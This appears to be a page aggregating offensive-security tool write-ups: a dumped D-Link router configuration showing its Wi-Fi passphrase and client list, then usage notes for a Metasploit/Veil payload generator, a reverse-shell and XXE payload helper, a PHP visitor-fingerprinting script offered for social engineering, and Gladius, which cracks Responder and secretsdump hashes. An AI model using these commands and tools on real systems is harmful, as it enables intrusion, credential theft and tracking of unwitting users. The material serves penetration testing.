Parameter Value
--------- -----
get_wps_enable 0
wifi_AP1_enable 1
get_client_list 9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0
wifi_AP1_ssid dlink-DWR-932
get_mac_address c4:00:f5:00:ec:40
wifi_AP1_security_mode 3208,8
wifi_AP1_hidden 0
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0



Payday - Payload generator that uses Metasploit and Veil


Payload generator that uses Metasploit and Veil. Takes IP address input and then builds payloads automatically. Calls Veil framework with supplied IP address and creates binaries and handlers. Uses msfvenom to create payloads and writes resource handler files in the same way that Veil does.

Examples:

Generate Metasploit Payloads
payday.py --msf --ip 1.1.1.1

Generate Veil Payloads
payday.py --veil --ip 1.1.1.1

Generate Both
payday.py --veil --msf --ip 1.1.1.1

Clean Out Directories
payday.py --clean

Specify custom output directory
payday --veil --msf --output /path/to/custom --ip 1.1.1.1

Clean custom output directory
payday --output /path/to/custom --clean


Brosec - An interactive reference tool to help security professionals utilize useful payloads and commands

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as...


Payload Variables


Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.

For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).


Available variables
  • LHOST : Local IP or name
  • LPORT : Local IP or name
  • RHOST : Remote IP or name
  • RPORT : Remote IP or name
  • USER : Username (only used in a few payloads)
  • PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)

Above are multiple examples of how to access and set the stored configuration variables.
  • Configuration variables can be viewed via the config command at any time, or by entering the variable name
  • Variables can be changed at any time by entering set <variable> <value>
  • You can also navigate to frequently used payloads by entering the menu sequence from the command line: bros <sequence>
    • Ex: bros 413 - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload

Additional Features and Usage Examples

XXE for Bros


In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.

Simple HTTP(s) Server

Need a quick web server? Forget python SimpleHTTPServer, bros has your back with bros http when entered via the command line. An SSL server? bros https has you covered.


Anonymous FTP Server

Need to exfiltrate some data via ftp? Bros comes with a handy bros ftp when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).

Installation

Releases
Some features are unavailable in the compiled version, but it is a good way to quickly try out Brosec

Manual installation

Mac
  • brew install node netcat - Install Nodejs and netcat (nc or ncat will work too)
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm dependencies

Kali Linux
  • apt-get install npm build-essential g++ xsel netcat - Install dependencies
  • npm config set registry http://registry.npmjs.org/ - The npm registry seems to be broken by default when installed from the Kali repos
  • npm install -g n - Install n (the Node.js version manager)
  • n latest - Install the latest version of Node.js
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm dependencies

Windows (Unsupported)
  • Install nodejs
  • Install ncat
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
Payloads that utilize netcat will not work on Windows because the kexec library is not supported there.

Optional

Add the bros directory path to your PATH environment variable, create a symlink for the bros file, etc.

Configuration

Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but it can be changed by editing the settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc).


GetDataReport - Script to collect information to the client side


A PHP+JS script for gathering information about a target through a web application; it uses PHP's $_SERVER variables and JavaScript functions to collect information about the client.

Plugin (WEBApps)
Some web applications need to collect information from the client in order to perform their tasks; with this plugin it is easier to work with the variables you need.
<?php

// Load the plugin and create the helper; each method below reads one
// client attribute from $_SERVER or from the JS-collected values.
include("GetdataReport.Plugin.php");
$data = new GetDataPlugin();

echo "<br>IP ".$data->ip();
echo "<br>Operating System ".$data->os();
echo "<br>Browser ".$data->browser();
echo "<br>Screen height ".$data->height();
echo "<br>Screen width ".$data->width();
echo "<br>Java enabled ".$data->javaenabled();
echo "<br>Cookie enabled ".$data->cookieenabled();
echo "<br>Language ".$data->language();
echo "<br>Architecture ".$data->architecture();
echo "<br>Device ".$data->device();
echo "<br>Country ".$data->geo('country');
echo "<br>Region ".$data->geo('region');
echo "<br>Continent ".$data->geo('continent');
echo "<br>City ".$data->geo('city');
echo "<br>Longitude ".$data->geo('logitude');   // key spelled as the plugin expects it
echo "<br>Latitude ".$data->geo('latitude');
echo "<br>Currency ".$data->geo('currency');
echo "<br>Provider ".$data->provetor();          // method name as defined by the plugin
echo "<br>Agent ".$data->agent();
echo "<br>Referer ".$data->referer();
echo "<br>Date ".$data->getdate();

?>

Hack (Social engineering)
With this script we can collect information from a target by routing them through the page (which then forwards to the given url) and generating an HTML page report:
        HTTP://127.0.0.1/GetdataReport.php?id=any&j=yes&url=google.com


Gladius - Easy mode from Responder to Credentials


Gladius provides an automated method for cracking credentials from various sources during an engagement. We currently crack hashes from Responder, secretsdump.py, and smart_hashdump.

Install
pip install watchdog
git clone https://www.github.com/praetorian-inc/gladius
cd gladius
git clone https://www.github.com/praetorian-inc/Hob0Rules
cp Hob0Rules/* .
rm -rf Hob0Rules/

Start
python gladius.py
Now start the responder session as normal
cd /usr/share/responder
python Responder.py -i YOUR_IP -I YOUR_INTERFACE

Working with secretsdump
Send results of secretsdump to Gladius for parsing and cracking.
for ip in $(cat ips); do secretsdump.py DOMAIN/username:password@$ip > /usr/share/responder/secretsdump_$ip; done

Help
$ python gladius.py -h
usage: gladius.py [-h] [-v] [--responder-dir RESPONDER_DIR]
                  [--hashcat HASHCAT] [-r RULESET] [-w WORDLIST] [--no-art]

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Increased output verbosity
  --responder-dir RESPONDER_DIR
                        Directory to watch for Responder output
  --hashcat HASHCAT     Path to hashcat binary
  -r RULESET, --ruleset RULESET
                        Ruleset to use with hashcat
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist to use with hashcat
  --no-art              Disable the sword ascii art for displaying credentials
                        and default to only text.

Workings

Ruleset
The default ruleset is an improved best64 ruleset from Julian Dunning (@hob0man) of Praetorian. His presentation on the topic can be found below:



Responder
Watches the Responder log directory for *NTLM*txt files. For each file found, it parses the output, creates a temp file containing the new hashes, and passes this to hashcat with the correct hash type.
To crack NTLM hashes from hashdump, put them in a file with `hashdump` in its name and drop it in the Responder directory.
Note: You will have to manually examine the output in `./engagement/responderhander_out/*` to check for results from `hashdump` cracking.

Credentials
Watches for output from hashcat and exports files with the following format:
Domain Username Password

Example module
To extend Gladius:
  • Create a new Handler class that inherits from GladiusHandler.
  • Add a list of regex matches for your specific file names (or '*' if the filename doesn't matter)
  • Create a process(self, event) function to perform actions on all files matching your pattern.
class YourHandler(GladiusHandler):

    # File name globs this handler reacts to ('*' = any file)
    patterns = ['*']

    def process(self, event):
        # get_lines() reads the file named by the watchdog event
        data = self.get_lines(event)

        # Perform work on data
Add yourself to the handlers list
handlers = [
    (ResponderHandler, args.responder),
    (CredsHandler, ResponderHandler().outpath),
    # Watch either the credential handler's output directory ...
    (YourHandler, CredsHandler().outpath),
    # ... or any fixed directory
    (YourHandler, '/tmp'),
]
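As an added illustration of the extension API above (not Gladius's own code: the GladiusHandler stand-in, the stubbed watchdog event and the Responder `user::DOMAIN:...` line layout are assumptions), a handler that only reacts to `*NTLM*txt` files and drops repeat captures of the same account before handing the lines on:

```python
import fnmatch
import os
import tempfile
import types

class GladiusHandler:
    # Assumed stand-in for Gladius's base class (not the project's code).
    patterns = ['*']

    def __init__(self, outpath):
        self.outpath = outpath

    def get_lines(self, event):
        with open(event.src_path) as fh:
            return [line.rstrip('\n') for line in fh if line.strip()]

class UniqueAccountHandler(GladiusHandler):
    # Hypothetical handler: one line per (user, domain) so an account captured
    # several times is queued once; assumes Responder's user::DOMAIN:... layout.
    patterns = ['*NTLM*txt']

    def process(self, event):
        seen, kept = set(), []
        for line in self.get_lines(event):
            parts = line.split(':', 3)
            if len(parts) < 3:          # not a user::domain:... line, skip it
                continue
            key = (parts[0].lower(), parts[2].lower())
            if key not in seen:
                seen.add(key)
                kept.append(line)
        out = os.path.join(self.outpath, os.path.basename(event.src_path) + '.unique')
        with open(out, 'w') as fh:
            fh.write('\n'.join(kept) + '\n')
        return kept

def dispatch(handlers, path):
    # README-style handlers list of (HandlerClass, outpath) pairs, run for one new file.
    name, event = os.path.basename(path), types.SimpleNamespace(src_path=path)
    return [cls(out).process(event) for cls, out in handlers
            if any(fnmatch.fnmatch(name, p) for p in cls.patterns)]

def demo():
    # Constructed sample: same account twice (case differs) plus a junk line.
    sample = ['alice::CORP:1122334455667788:deadbeef:0101', 'ALICE::corp:8877665544332211:cafebabe:0101',
              'bob::CORP:0000111122223333:feedface:0101', 'not a capture line']
    path = os.path.join(tempfile.mkdtemp(prefix='gladius_demo_'), 'SMB-NTLMv2-Client-10.0.0.5.txt')
    with open(path, 'w') as fh:
        fh.write('\n'.join(sample) + '\n')
    return dispatch([(UniqueAccountHandler, os.path.dirname(path))], path)
```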

